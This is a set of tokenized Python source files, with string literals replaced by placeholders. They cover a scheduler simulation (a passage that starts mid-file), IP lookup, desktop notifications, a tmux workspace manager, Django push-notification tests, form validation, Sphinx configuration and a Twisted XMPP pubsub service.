interarrival_delay ) <EOL> new_events . append ( ( current_time + arrival_delay , self ) ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % len ( new_events ) ) <EOL> return new_events <EOL> class ProbeEvent ( Event ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , worker , job_id ) : <EOL> self . worker = worker <EOL> self . job_id = job_id <EOL> def run ( self , current_time ) : <EOL> return self . worker . add_probe ( self . job_id , current_time ) <EOL> class NoopGetTaskResponseEvent ( Event ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , worker , num_tasks ) : <EOL> self . worker = worker <EOL> self . num_tasks = num_tasks <EOL> def run ( self , current_time ) : <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( self . worker . id , current_time ) ) <EOL> return self . worker . free_slots ( current_time , self . num_tasks ) <EOL> class TaskEndEvent ( ) : <EOL> def __init__ ( self , worker ) : <EOL> self . worker = worker <EOL> def run ( self , current_time ) : <EOL> return self . worker . free_slots ( current_time , <NUM_LIT:1> ) <EOL> class Worker ( object ) : <EOL> def __init__ ( self , simulation , num_slots , id ) : <EOL> self . simulation = simulation <EOL> self . num_free_slots = num_slots <EOL> self . queued_probes = Queue . Queue ( ) <EOL> self . id = id <EOL> self . probes_replied_to_immediately = <NUM_LIT:0> <EOL> def add_probe ( self , job_id , current_time ) : <EOL> self . queued_probes . put ( job_id ) <EOL> new_events = self . maybe_get_tasks ( current_time ) <EOL> self . probes_replied_to_immediately += len ( new_events ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( self . id , self . probes_replied_to_immediately ) ) <EOL> return new_events <EOL> def free_slots ( self , current_time , num_slots ) : <EOL> """<STR_LIT>""" <EOL> self . num_free_slots += num_slots <EOL> get_task_events = self . 
maybe_get_tasks ( current_time ) <EOL> return get_task_events <EOL> def maybe_get_tasks ( self , current_time ) : <EOL> events = [ ] <EOL> while not self . queued_probes . empty ( ) and self . num_free_slots > <NUM_LIT:0> : <EOL> self . num_free_slots -= <NUM_LIT:1> <EOL> job_id = self . queued_probes . get ( ) <EOL> num_tasks_to_get = <NUM_LIT:1> <EOL> if self . num_free_slots > <NUM_LIT:0> and self . queued_probes . empty ( ) : <EOL> num_tasks_to_get += self . num_free_slots <EOL> self . num_free_slots = <NUM_LIT:0> <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % num_tasks_to_get ) <EOL> task_durations = self . simulation . get_tasks ( job_id , num_tasks_to_get ) <EOL> probe_response_time = current_time + <NUM_LIT:2> * NETWORK_DELAY <EOL> events = [ ] <EOL> for task_duration in task_durations : <EOL> task_end_time = probe_response_time + task_duration <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> ( job_id , self . id , current_time , task_duration , task_end_time ) ) <EOL> self . simulation . add_task_completion_time ( job_id , task_end_time ) <EOL> events . append ( ( task_end_time , TaskEndEvent ( self ) ) ) <EOL> if len ( events ) < num_tasks_to_get : <EOL> unfilled_slots = num_tasks_to_get - len ( events ) <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( self . id , probe_response_time ) ) <EOL> events . append ( ( probe_response_time , <EOL> NoopGetTaskResponseEvent ( self , unfilled_slots ) ) ) <EOL> return events <EOL> class Simulation ( object ) : <EOL> def __init__ ( self , num_jobs , file_prefix , load , task_distribution ) : <EOL> avg_used_slots = load * SLOTS_PER_WORKER * TOTAL_WORKERS <EOL> self . interarrival_delay = ( <NUM_LIT:1.0> * MEDIAN_TASK_DURATION * TASKS_PER_JOB / avg_used_slots ) <EOL> print ( "<STR_LIT>" % <EOL> ( self . interarrival_delay , avg_used_slots ) ) <EOL> self . jobs = { } <EOL> self . remaining_jobs = num_jobs <EOL> self . 
event_queue = Queue . PriorityQueue ( ) <EOL> self . workers = [ ] <EOL> self . file_prefix = file_prefix <EOL> while len ( self . workers ) < TOTAL_WORKERS : <EOL> self . workers . append ( Worker ( self , SLOTS_PER_WORKER , len ( self . workers ) ) ) <EOL> self . worker_indices = range ( TOTAL_WORKERS ) <EOL> self . task_distribution = task_distribution <EOL> def send_probes ( self , job , current_time ) : <EOL> """<STR_LIT>""" <EOL> self . jobs [ job . id ] = job <EOL> random . shuffle ( self . worker_indices ) <EOL> probe_events = [ ] <EOL> num_probes = PROBE_RATIO * len ( job . unscheduled_tasks ) <EOL> for worker_index in self . worker_indices [ : num_probes ] : <EOL> probe_events . append ( ( current_time + NETWORK_DELAY , <EOL> ProbeEvent ( self . workers [ worker_index ] , job . id ) ) ) <EOL> return probe_events <EOL> def get_tasks ( self , job_id , num_tasks ) : <EOL> job = self . jobs [ job_id ] <EOL> remaining_tasks = num_tasks <EOL> task_durations = [ ] <EOL> while len ( job . unscheduled_tasks ) > <NUM_LIT:0> and remaining_tasks > <NUM_LIT:0> : <EOL> task_durations . append ( job . unscheduled_tasks [ <NUM_LIT:0> ] ) <EOL> job . unscheduled_tasks = job . unscheduled_tasks [ <NUM_LIT:1> : ] <EOL> remaining_tasks -= <NUM_LIT:1> <EOL> assert len ( task_durations ) + remaining_tasks == num_tasks <EOL> return task_durations <EOL> def add_task_completion_time ( self , job_id , completion_time ) : <EOL> job_complete = self . jobs [ job_id ] . task_completed ( completion_time ) <EOL> if job_complete : <EOL> self . remaining_jobs -= <NUM_LIT:1> <EOL> logging . getLogger ( "<STR_LIT>" ) . debug ( "<STR_LIT>" % <EOL> ( job_id , self . jobs [ job_id ] . end_time - self . jobs [ job_id ] . start_time ) ) <EOL> def run ( self ) : <EOL> half_jobs = self . remaining_jobs / <NUM_LIT:2> <EOL> self . event_queue . put ( ( <NUM_LIT:0> , JobArrival ( self , self . interarrival_delay , self . 
task_distribution ) ) ) <EOL> last_time = <NUM_LIT:0> <EOL> output_worker_loads = False <EOL> while self . remaining_jobs > <NUM_LIT:0> : <EOL> if not output_worker_loads and self . remaining_jobs == half_jobs : <EOL> worker_loads = [ w . num_free_slots for w in self . workers ] <EOL> plot_cdf ( worker_loads , "<STR_LIT>" % self . file_prefix ) <EOL> output_worker_loads = True <EOL> current_time , event = self . event_queue . get ( ) <EOL> assert current_time >= last_time <EOL> last_time = current_time <EOL> new_events = event . run ( current_time ) <EOL> for new_event in new_events : <EOL> self . event_queue . put ( new_event ) <EOL> print ( "<STR_LIT>" % <EOL> ( last_time , len ( self . jobs ) ) ) <EOL> complete_jobs = [ j for j in self . jobs . values ( ) if j . completed_tasks_count == j . num_tasks ] <EOL> print "<STR_LIT>" % len ( complete_jobs ) <EOL> response_times = [ job . end_time - job . start_time for job in complete_jobs <EOL> if job . start_time > <NUM_LIT:0> ] <EOL> print "<STR_LIT>" % len ( response_times ) <EOL> plot_cdf ( response_times , "<STR_LIT>" % self . file_prefix ) <EOL> print "<STR_LIT>" , numpy . mean ( response_times ) <EOL> longest_tasks = [ job . longest_task for job in complete_jobs ] <EOL> plot_cdf ( longest_tasks , "<STR_LIT>" % self . file_prefix ) <EOL> tasks_replied_to_immediately = sum ( [ w . probes_replied_to_immediately for w in self . workers ] ) <EOL> print "<STR_LIT>" , tasks_replied_to_immediately <EOL> return response_times <EOL> def main ( ) : <EOL> random . seed ( <NUM_LIT:1> ) <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> sim = Simulation ( <NUM_LIT:1000> , "<STR_LIT>" , <NUM_LIT> , TaskDistributions . CONSTANT ) <EOL> sim . run ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import netaddr <EOL> def lookup ( name ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ip = netaddr . IPAddress ( name ) <EOL> return __generator ( [ ip ] ) <EOL> except Exception as e : <EOL> pass <EOL> try : <EOL> subnet = netaddr . IPNetwork ( name ) <EOL> return __generator ( subnet ) <EOL> except Exception as e : <EOL> pass <EOL> try : <EOL> glob = netaddr . IPGlob ( name ) <EOL> return __generator ( glob ) <EOL> except Exception as e : <EOL> pass <EOL> return None <EOL> def __generator ( x ) : <EOL> '''<STR_LIT>''' <EOL> for item in x : <EOL> yield ( item , str ( item ) , None ) </s>
<s> from dbus . exceptions import DBusException <EOL> try : <EOL> from gi . repository import Notify <EOL> except ImportError : <EOL> from scudcloud import notify2 <EOL> Notify = None <EOL> class Notifier ( object ) : <EOL> def __init__ ( self , app_name , icon ) : <EOL> self . icon = icon <EOL> try : <EOL> if Notify is not None : <EOL> Notify . init ( app_name ) <EOL> self . notifier = Notify <EOL> else : <EOL> notify2 . init ( app_name ) <EOL> self . notifier = notify2 <EOL> self . enabled = True <EOL> except DBusException : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . enabled = False <EOL> def notify ( self , title , message , icon = None ) : <EOL> if not self . enabled : <EOL> return <EOL> if icon is None : <EOL> icon = self . icon <EOL> if Notify is not None : <EOL> notice = self . notifier . Notification . new ( title , message , icon ) <EOL> else : <EOL> notice = notify2 . Notification ( title , message , icon ) <EOL> notice . set_hint_string ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> notice . show ( ) </s>
<s> import re <EOL> import sys <EOL> import os <EOL> from . logger import Logger <EOL> from . tmux import Tmux <EOL> from . git import Git <EOL> log = Logger ( ) <EOL> class WorkspaceException ( Exception ) : <EOL> def __init__ ( self , message , errors = '<STR_LIT>' ) : <EOL> super ( WorkspaceException , self ) . __init__ ( message ) <EOL> self . errors = errors <EOL> self . message = message <EOL> class Workspace ( object ) : <EOL> _tmux = Tmux ( ) <EOL> _config = { } <EOL> _name = '<STR_LIT>' <EOL> _root = '<STR_LIT>' <EOL> _venv = [ ] <EOL> _session = { } <EOL> _windows = [ ] <EOL> def __init__ ( self , config = None ) : <EOL> """<STR_LIT>""" <EOL> self . set_config ( config ) <EOL> def set_config ( self , config ) : <EOL> self . _config = config <EOL> self . _name = self . _config . get ( '<STR_LIT:name>' ) <EOL> self . _root = self . _config . get ( '<STR_LIT>' ) or os . getcwd ( ) <EOL> self . _root = os . path . expanduser ( self . _root ) <EOL> venv = self . _config . get ( '<STR_LIT>' ) <EOL> if venv : <EOL> if self . _root and not os . path . isabs ( venv ) : <EOL> venv = os . path . join ( self . _root , venv ) <EOL> self . _venv = [ <EOL> '<STR_LIT>' . format ( os . path . join ( venv , '<STR_LIT>' ) ) ] <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _root : <EOL> if not os . path . isdir ( self . _root ) : <EOL> raise WorkspaceException ( '<STR_LIT>' , <EOL> self . _root ) <EOL> os . chdir ( self . _root ) <EOL> for window in self . _config . get ( '<STR_LIT>' , [ ] ) : <EOL> if isinstance ( window , str ) : <EOL> name = window <EOL> else : <EOL> name = next ( iter ( window . keys ( ) ) ) <EOL> window = window [ name ] or { } <EOL> if isinstance ( window , str ) : <EOL> panes = [ window ] <EOL> window = { } <EOL> else : <EOL> panes = window . get ( '<STR_LIT>' , [ ] ) <EOL> post_cmds = window . get ( '<STR_LIT>' , [ ] ) <EOL> post_cmds = [ post_cmds ] if isinstance ( post_cmds , str ) else post_cmds <EOL> self . _windows . 
append ( <EOL> self . create_window ( <EOL> name , panes , post_cmds , window . get ( '<STR_LIT>' ) ) ) <EOL> self . attach ( ) <EOL> return self . _windows <EOL> def stop ( self , name = None ) : <EOL> """<STR_LIT>""" <EOL> self . _tmux . kill_session ( name or self . _name ) <EOL> def attach ( self , name = None ) : <EOL> """<STR_LIT>""" <EOL> self . _tmux . attach ( name or self . _name ) <EOL> def ls ( self ) : <EOL> """<STR_LIT>""" <EOL> windows , errors = self . _tmux . get_windows ( self . _name ) <EOL> if errors : <EOL> raise WorkspaceException ( '<STR_LIT>' , errors ) <EOL> log . echo ( '<STR_LIT>' ) <EOL> log . echo ( repr ( windows ) ) <EOL> for window in windows : <EOL> win_id = window [ '<STR_LIT>' ] <EOL> panes , errors = self . _tmux . get_panes ( self . _name , win_id ) <EOL> if errors : <EOL> raise WorkspaceException ( '<STR_LIT>' , errors ) <EOL> log . echo ( '<STR_LIT>' . format ( win_id ) ) <EOL> log . echo ( repr ( panes ) ) <EOL> def create_window ( self , name , panes , post_cmds , layout = None ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . _windows ) > <NUM_LIT:0> : <EOL> window , pane = self . _tmux . new_window ( self . _name , name ) <EOL> else : <EOL> self . _session , window , pane = self . _tmux . new_session ( self . _name , name ) <EOL> if not self . _session : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> session_name = self . _session [ '<STR_LIT:name>' ] <EOL> window [ '<STR_LIT>' ] = [ ] <EOL> for pane_schema in panes : <EOL> if len ( window [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> pane = self . _tmux . new_pane ( session_name , name , pane [ '<STR_LIT:index>' ] ) <EOL> window [ '<STR_LIT>' ] . append ( pane ) <EOL> cmds = next ( iter ( pane_schema . values ( ) ) ) if isinstance ( pane_schema , dict ) else [ pane_schema ] <EOL> cmds = self . _venv + cmds + post_cmds <EOL> for cmd in cmds : <EOL> self . _tmux . send_keys ( session_name , name , pane [ '<STR_LIT:index>' ] , cmd ) <EOL> self . _tmux . 
set_layout ( session_name , name , layout ) <EOL> return window <EOL> @ staticmethod <EOL> def initialize ( root_dir ) : <EOL> """<STR_LIT>""" <EOL> dirs = next ( os . walk ( root_dir ) ) [ <NUM_LIT:1> ] <EOL> repos = [ ] <EOL> skipped = [ ] <EOL> for directory in dirs : <EOL> os . chdir ( os . path . join ( root_dir , directory ) ) <EOL> if Git . is_git_repo ( ) : <EOL> log . echo ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( directory ) ) <EOL> url = Git . get_remote_url ( ) <EOL> name = url . replace ( '<STR_LIT::>' , '<STR_LIT:/>' ) <EOL> name = re . sub ( '<STR_LIT>' , '<STR_LIT>' , name ) <EOL> name = '<STR_LIT:/>' . join ( name . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:2> : ] ) <EOL> if name . split ( '<STR_LIT:/>' ) [ <NUM_LIT:1> ] == directory : <EOL> repos . append ( name ) <EOL> else : <EOL> repos . append ( { '<STR_LIT>' : directory , '<STR_LIT:name>' : name } ) <EOL> else : <EOL> skipped . append ( directory ) <EOL> log . echo ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( skipped ) ) ) <EOL> return { <EOL> '<STR_LIT:name>' : os . path . basename ( root_dir ) , <EOL> '<STR_LIT>' : root_dir , <EOL> '<STR_LIT>' : repos <EOL> } </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> keywords = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from django . contrib . auth import get_user_model <EOL> import mock <EOL> from django . test import TestCase <EOL> from pushy . utils import send_push_notification <EOL> from pushy . models import PushNotification , Device <EOL> class AddTaskTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . payload = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def test_add_task ( self ) : <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_once_with ( notification_id = notification . id ) <EOL> self . assertEquals ( notification . payload , self . payload ) <EOL> def test_add_task_filter_device ( self ) : <EOL> device = Device . objects . create ( key = '<STR_LIT>' , <EOL> type = Device . DEVICE_TYPE_IOS ) <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , device = device ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( kwargs = { <EOL> '<STR_LIT>' : device . id , <EOL> '<STR_LIT>' : notification . payload <EOL> } ) <EOL> def test_add_task_filter_on_user ( self ) : <EOL> user = get_user_model ( ) . objects . create_user ( username = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , <EOL> filter_user = user ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( notification_id = notification . id ) <EOL> self . assertEqual ( notification . filter_user , user . 
id ) <EOL> self . assertEqual ( notification . filter_type , <NUM_LIT:0> ) <EOL> def test_add_task_filter_on_device_type ( self ) : <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , <EOL> filter_type = Device . DEVICE_TYPE_IOS ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( notification_id = notification . id ) <EOL> self . assertEqual ( notification . filter_user , <NUM_LIT:0> ) <EOL> self . assertEqual ( notification . filter_type , Device . DEVICE_TYPE_IOS ) <EOL> def test_add_task_filter_on_device_type_and_user ( self ) : <EOL> user = get_user_model ( ) . objects . create_user ( username = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> mock_task = mock . Mock ( ) <EOL> with mock . patch ( '<STR_LIT>' , new = mock_task ) as mocked_task : <EOL> send_push_notification ( '<STR_LIT>' , self . payload , <EOL> filter_type = Device . DEVICE_TYPE_IOS , <EOL> filter_user = user ) <EOL> notification = PushNotification . objects . latest ( '<STR_LIT:id>' ) <EOL> mocked_task . assert_called_with ( notification_id = notification . id ) <EOL> self . assertEqual ( notification . filter_user , user . id ) <EOL> self . assertEqual ( notification . filter_type , Device . DEVICE_TYPE_IOS ) </s>
<s> import formencode <EOL> import pylons <EOL> from pylons import app_globals as g <EOL> class OutputSchema ( formencode . Schema ) : <EOL> allow_extra_fields = False <EOL> enabled = formencode . validators . Int ( ) <EOL> class ConfigForm ( formencode . Schema ) : <EOL> allow_extra_fields = True <EOL> filter_extra_fields = True <EOL> action = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> cancel = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> firsttime = formencode . validators . Int ( not_empty = False , if_missing = <NUM_LIT:0> ) <EOL> server = formencode . validators . String ( strip = True , not_empty = True , messages = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> port = formencode . validators . Int ( strip = True , not_empty = True , messages = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> password = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> webpassword = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> timeout = formencode . validators . Bool ( ) <EOL> default_search = formencode . validators . String ( not_empty = True ) <EOL> awskey = formencode . validators . String ( strip = True , not_empty = False , if_missing = None ) <EOL> aws_secret = formencode . validators . String ( strip = True , not_empty = False , if_missing = None ) <EOL> outputs = formencode . ForEach ( OutputSchema ( ) , if_missing = [ ] ) <EOL> class StreamNameInUse ( formencode . validators . FancyValidator ) : <EOL> def validate_python ( self , values , state ) : <EOL> if values [ '<STR_LIT>' ] : <EOL> return <EOL> if values [ '<STR_LIT:name>' ] in [ name [ <NUM_LIT:0> ] for name in g . tc . streams ] : <EOL> raise formencode . Invalid ( { '<STR_LIT>' : "<STR_LIT>" } , values , state ) <EOL> class StreamForm ( formencode . Schema ) : <EOL> allow_extra_fields = False <EOL> name = formencode . validators . 
String ( not_empty = True , strip = True , messages = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> url = formencode . validators . URL ( not_empty = True , require_tld = False , strip = True , check_exists = False , messages = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> oldname = formencode . validators . String ( not_empty = False ) <EOL> chained_validators = [ StreamNameInUse ( ) ] <EOL> class State ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kw ) : <EOL> for key in kw : <EOL> setattr ( self , key , kw [ key ] ) <EOL> def __repr__ ( self ) : <EOL> atts = [ ] <EOL> for key in self . __dict__ : <EOL> atts . append ( ( key , getattr ( self , key ) ) ) <EOL> return self . __class__ . __name__ + '<STR_LIT:(>' + '<STR_LIT:U+002CU+0020>' . join ( x [ <NUM_LIT:0> ] + '<STR_LIT:=>' + repr ( x [ <NUM_LIT:1> ] ) for x in atts ) + '<STR_LIT:)>' <EOL> def validate_custom ( schema , ** state_kwargs ) : <EOL> """<STR_LIT>""" <EOL> if state_kwargs : <EOL> state = State ( ** state_kwargs ) <EOL> else : <EOL> state = None <EOL> if state_kwargs . get ( '<STR_LIT>' , False ) : <EOL> params = formencode . variabledecode . variable_decode ( pylons . request . params ) <EOL> print pylons . request . params <EOL> print params <EOL> else : <EOL> params = pylons . request . params <EOL> return schema . to_python ( params , state ) <EOL> def htmlfill ( html , exception_error = None ) : <EOL> """<STR_LIT>""" <EOL> return formencode . htmlfill . render ( <EOL> form = html , <EOL> defaults = pylons . request . params , <EOL> errors = ( exception_error and exception_error . unpack_errors ( ) ) , <EOL> encoding = pylons . response . determine_charset ( ) <EOL> ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> autoclass_content = '<STR_LIT>' <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] </s>
<s> from twisted . application import service <EOL> from twisted . python import usage <EOL> from twisted . words . protocols . jabber . jid import JID <EOL> from wokkel . component import Component <EOL> from wokkel . disco import DiscoHandler <EOL> from wokkel . generic import FallbackHandler , VersionHandler <EOL> from wokkel . iwokkel import IPubSubResource <EOL> from wokkel . pubsub import PubSubService <EOL> from idavoll import __version__ <EOL> from idavoll . backend import BackendService <EOL> class Options ( usage . Options ) : <EOL> optParameters = [ <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT:127.0.0.1>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ] <EOL> optFlags = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:v>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' ) <EOL> ] <EOL> def postOptions ( self ) : <EOL> if self [ '<STR_LIT>' ] not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise usage . UsageError , "<STR_LIT>" <EOL> self [ '<STR_LIT>' ] = JID ( self [ '<STR_LIT>' ] ) <EOL> def makeService ( config ) : <EOL> s = service . MultiService ( ) <EOL> if config [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> from twisted . enterprise import adbapi <EOL> from idavoll . pgsql_storage import Storage <EOL> from psycopg2 . extras import NamedTupleConnection <EOL> dbpool = adbapi . 
ConnectionPool ( '<STR_LIT>' , <EOL> user = config [ '<STR_LIT>' ] , <EOL> password = config [ '<STR_LIT>' ] , <EOL> database = config [ '<STR_LIT>' ] , <EOL> host = config [ '<STR_LIT>' ] , <EOL> port = config [ '<STR_LIT>' ] , <EOL> cp_reconnect = True , <EOL> client_encoding = '<STR_LIT:utf-8>' , <EOL> connection_factory = NamedTupleConnection , <EOL> ) <EOL> st = Storage ( dbpool ) <EOL> elif config [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> from idavoll . memory_storage import Storage <EOL> st = Storage ( ) <EOL> bs = BackendService ( st ) <EOL> bs . setName ( '<STR_LIT>' ) <EOL> bs . setServiceParent ( s ) <EOL> cs = Component ( config [ "<STR_LIT>" ] , int ( config [ "<STR_LIT>" ] ) , <EOL> config [ "<STR_LIT>" ] . full ( ) , config [ "<STR_LIT>" ] ) <EOL> cs . setName ( '<STR_LIT>' ) <EOL> cs . setServiceParent ( s ) <EOL> cs . factory . maxDelay = <NUM_LIT> <EOL> if config [ "<STR_LIT>" ] : <EOL> cs . logTraffic = True <EOL> FallbackHandler ( ) . setHandlerParent ( cs ) <EOL> VersionHandler ( '<STR_LIT>' , __version__ ) . setHandlerParent ( cs ) <EOL> DiscoHandler ( ) . setHandlerParent ( cs ) <EOL> resource = IPubSubResource ( bs ) <EOL> resource . hideNodes = config [ "<STR_LIT>" ] <EOL> resource . serviceJID = config [ "<STR_LIT>" ] <EOL> ps = PubSubService ( resource ) <EOL> ps . setHandlerParent ( cs ) <EOL> resource . pubsubService = ps <EOL> return s </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> from zope . interface import Interface <EOL> from twisted . python . deprecate import deprecatedModuleAttribute <EOL> from twisted . python . versions import Version <EOL> from twisted . words . protocols . jabber . ijabber import IXMPPHandler <EOL> from twisted . words . protocols . jabber . ijabber import IXMPPHandlerCollection <EOL> deprecatedModuleAttribute ( <EOL> Version ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" , <EOL> __name__ , <EOL> "<STR_LIT>" ) <EOL> deprecatedModuleAttribute ( <EOL> Version ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> __name__ , <EOL> "<STR_LIT>" ) <EOL> class IDisco ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def getDiscoInfo ( requestor , target , nodeIdentifier = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> def getDiscoItems ( requestor , target , nodeIdentifier = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> class IPubSubClient ( Interface ) : <EOL> def itemsReceived ( event ) : <EOL> """<STR_LIT>""" <EOL> def deleteReceived ( event ) : <EOL> """<STR_LIT>""" <EOL> def purgeReceived ( event ) : <EOL> """<STR_LIT>""" <EOL> def createNode ( service , nodeIdentifier = None ) : <EOL> """<STR_LIT>""" <EOL> def deleteNode ( service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def subscribe ( service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def unsubscribe ( service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def publish ( service , nodeIdentifier , items = [ ] ) : <EOL> """<STR_LIT>""" <EOL> class IPubSubService ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def notifyPublish ( service , nodeIdentifier , notifications ) : <EOL> """<STR_LIT>""" <EOL> def notifyDelete ( service , nodeIdentifier , subscribers , <EOL> redirectURI = None ) : <EOL> """<STR_LIT>""" 
